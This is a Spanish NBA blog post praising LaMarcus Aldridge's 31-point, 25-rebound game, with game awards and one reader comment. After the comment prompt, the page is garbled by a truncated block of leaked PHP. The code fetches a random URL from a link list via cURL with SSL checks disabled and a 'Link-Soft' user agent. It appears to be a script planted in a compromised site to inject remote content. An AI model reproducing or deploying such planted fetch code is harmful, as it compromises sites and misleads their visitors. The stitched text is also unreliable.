La Crónica: Say my name

13 de December de 2013 por TheDeerHunter

¿Casualidad? Ayer se hacía público el recuento provisional de votaciones para el all-star. Ahí abajo, con casi 133.000 votos, en la octava posición del frontcourt del oeste; en la 14ª posición global de la conferencia y en la 22ª de toda la liga, aparecía LaMarcus Aldridge. Poco tiempo después en las gradas del Rose Garden se coreaba el “MVP, MVP”. Por primera vez en la historia de la franquicia un jugador local se marcaba un 30-25, con cierto tono a reivindicación. Sólo otros 3 jugadores han logrado algo así en la última década. Ahora mismo es más difícil encontrar razones para justificar el estatus (anti) popular de LaMarcus Aldridge que hacer lo propio para discutirle su condición de mejor 4 de la liga y de contendiente al MVP, junto a únicamente 4 o 5 nombres más. A priori no es uno de ellos Dwight Howard, que también cuajó una de sus mejores actuaciones del año, quedando empequeñecida por la exhibición de juego al poste alto, agresividad bajo tableros y variedad de lanzamientos de media distancia por parte del bueno de LaMarcus. Por clase y elegancia, desde Chris Webber posiblemente no vimos nada igual. Gracias a esta descomunal actuación los Blazers lograron sobreponerse a la mala actuación de Lillard y lograr sostener las embestidas de Howard y Harden, manteniendo así la primera plaza de la conferencia Oeste.

En el otro partido de la jornada había morbo en el enfrentamiento Pierce&Garnett vs Doc Rivers. Desayunamos titulares señalando que los primeros vencieron a su extécnico. La realidad es que fue un pésimo día para el equipo de Rivers, pero Pierce no fue titular y la actuación de Garnett fue prácticamente irrelevante. Blatche se sacó de la manga una de esas actuaciones sobresalientes que ocasionalmente le salen y estuvo bien acompañado por Joe Johnson, Deron y Brook López. Éste último, por cierto, se volvió a lesionar. Los Clippers mantienen su cuarta plaza de conferencia, pero los Nets acarician ya la zona de playoffs.

PREMIOS

MVP: Se trata de uno de los hombres más infravalorados de nuestra época. LaMarcus Aldridge firmó 31 puntos, 25 rebotes, 2 tapones, 2 asistencias y 2 robos. Si su equipo sigue en esta línea hay que tenerle muy presente para todo.

Sorpresa: Relativa, pero si hiciéramos un gráfico con la eficiencia de Andray Blatche nos saldría algo muy parecido a una montaña rusa. Anoche tocó la cara buena, la que borda el baloncesto con números de all-star. 21 puntos, 9 rebotes, 3 asistencias en 28 minutos. Muy pocos errores.

Decepción: Pésimo partido de Lillard de cara al aro, aunque al menos su equipo ganó el partido. En frente tenía al 4º más votado del backcourt del oeste jugando 15 minutos (Lin) y al 15º del frontcourt no jugando absolutamente nada (Asik) El 6º del frontcourt del este anotó una sola canasta y jugó otros 15 minutos (Garnett) pero el premio se lo damos en esta ocasión a Blake Griffin, que se quedó en 12 puntos con una terrible serie de tiro de 2 de 8.

Esfuerzo en vano: 57 puntos, 23 rebotes, 8 asistencias, 3 tapones, 3 robos… el H&H de Houston. Howard-Harden.

Comenta

Un comentario a esta entrada

  1. The wolf dice:
    #1

    Equipos que dan la “sorpresa” y se revelan ante los pronósticos como Portland es lo que hacen bonita esta liga temporada tras temporada.

    Pero es que esto ya no es flor de un día, si uno falla (Lilliard) llega Robin Lopez y se casca un 7 de 9 con 10 rebotes y sobretodo aparece Batum con un 15-6-6 y una incidencia en el juego brutal. Por supuesto destacar a Matthews que está siendo una constante positiva en todos los partidos de portland jugando a un nivel increible.

    Lo único que puede llegar a dudar acerca de hasta donde pueden llegar esto Blazers podría ser su corta rotación. Pero hasta que este equipo llega a fallar (si es que falla), lo único que se puede hacer es ver los máximos partidos posibles disfrutando de este equipo y del posiblemente jugador en mejor forma de lo que llevamos de curso, LaMarcus Aldridge.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>